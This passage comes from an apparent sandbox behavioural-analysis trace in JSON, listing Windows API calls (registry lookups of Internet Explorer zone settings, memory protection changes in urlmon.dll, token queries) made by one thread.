"0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlGetDeviceFamilyInfoEnum" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc1d0" } ], "repeated": 0, "id": 489 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771bc254", "parentcaller": "0x72a530aa", "category": "system", "api": "NtQueryLicenseValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "Kernel-OneCore-DeviceFamilyID" }, { "name": "Type", "value": "0x00000004" } ], "repeated": 0, "id": 490 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771800bd", "parentcaller": "0x7650c52d", "category": "system", "api": "NtQueryLicenseValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" }, { "name": "Type", "value": "0x00000004" } ], "repeated": 0, "id": 491 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e8" }, { "name": "ObjectAttributesName", "value": "FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001" } ], "repeated": 0, "id": 492 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001" } ], "repeated": 0, "id": 493 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 494 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } ], "repeated": 0, "id": 495 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 496 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap" } ], "repeated": 0, "id": 497 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f1788", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 498 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653705e", "parentcaller": "0x764f182d", "category": "registry", "api": "NtCreateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "Class", "value": "" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 499 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 500 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" } ], "repeated": 0, "id": 501 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 502 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" } ], "repeated": 0, "id": 503 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 504 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" } ], "repeated": 0, "id": 505 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 506 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\" } ], "repeated": 0, "id": 507 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 508 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Internet Explorer" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer" } ], "repeated": 0, "id": 509 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003cc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002f4" }, { "name": "ObjectAttributesName", "value": "Microsoft\\Internet Explorer\\Security" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security" } ], "repeated": 0, "id": 510 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000003cc" }, { "name": "ValueName", "value": "DisableSecuritySettingsCheck" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck" } ], "repeated": 0, "id": 511 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72a559f4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003cc" } ], "repeated": 0, "id": 512 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003cc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002f8" }, { "name": "ObjectAttributesName", "value": "Microsoft\\Internet Explorer\\Security" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security" } ], "repeated": 0, "id": 513 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000003cc" }, { "name": "ValueName", "value": "DisableSecuritySettingsCheck" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck" } ], "repeated": 0, "id": 514 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72a559f4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003cc" } ], "repeated": 0, "id": 515 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 516 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 517 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x74a08afd", "parentcaller": "0x74a0deb5", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "0", "pretty_value": "ThreadBasicInformation" }, { "name": "ThreadInformation", "value": "\\x03\\x01\\x00\\x00\\x00\\xd03\\x00\\xe0\r\\x00\\x00\\x1c+\\x00\\x00\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "11036" } ], "repeated": 0, "id": 518 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e12c8", "parentcaller": "0x764e0f2e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x40000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003cc" }, { "name": "DesiredAccess", "value": "0x000f0007", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_WRITE" }, { "name": "ObjectAttributes", "value": "Local\\UrlZonesSM_admin" }, { "name": "FileHandle", "value": "0x00000000" } ], "repeated": 0, "id": 519 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764fc39b", "parentcaller": "0x72719c6f", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003cc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04660000" }, { "name": "SectionOffset", "value": "0x043cf3f0" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 520 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764df044", "parentcaller": "0x72a5c79a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x000003d0" } ], "repeated": 0, "id": 521 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e18b6", "parentcaller": "0x72a5c870", "category": "process", "api": "NtQueryInformationToken", "status": false, "return": "0xffffffffc0000023", "pretty_return": "BUFFER_TOO_SMALL", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "" } ], "repeated": 0, "id": 522 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e18b6", "parentcaller": "0x72a5c8a5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xf8\\x04q\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00" } ], "repeated": 0, "id": 523 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x72a5c7b8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 524 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 525 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "System\\Setup" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\Setup" } ], "repeated": 0, "id": 526 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "ValueName", "value": "SystemSetupInProgress" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress" } ], "repeated": 0, "id": 527 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72736c94", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 528 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 529 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" } ], "repeated": 0, "id": 530 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000003d0" }, { "name": "ObjectAttributesName", "value": "0" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" } ], "repeated": 0, "id": 531 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72736bf0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d4" } ], "repeated": 0, "id": 532 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000003d0" }, { "name": "ObjectAttributesName", "value": "1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1" } ], "repeated": 0, "id": 533 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72736bf0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d4" } ], "repeated": 0, "id": 534 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000003d0" }, { "name": "ObjectAttributesName", "value": "2" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2" } ], "repeated": 0, "id": 535 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72736bf0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d4" } ], "repeated": 0, "id": 536 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000003d0" }, { "name": "ObjectAttributesName", "value": "3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 537 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72736bf0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d4" } ], "repeated": 0, "id": 538 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000003d0" }, { "name": "ObjectAttributesName", "value": "4" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" } ], "repeated": 0, "id": 539 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72736bf0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d4" } ], "repeated": 0, "id": 540 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72736bff", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 541 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 542 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" } ], "repeated": 0, "id": 543 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 544 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" } ], "repeated": 0, "id": 545 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 546 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\" }, 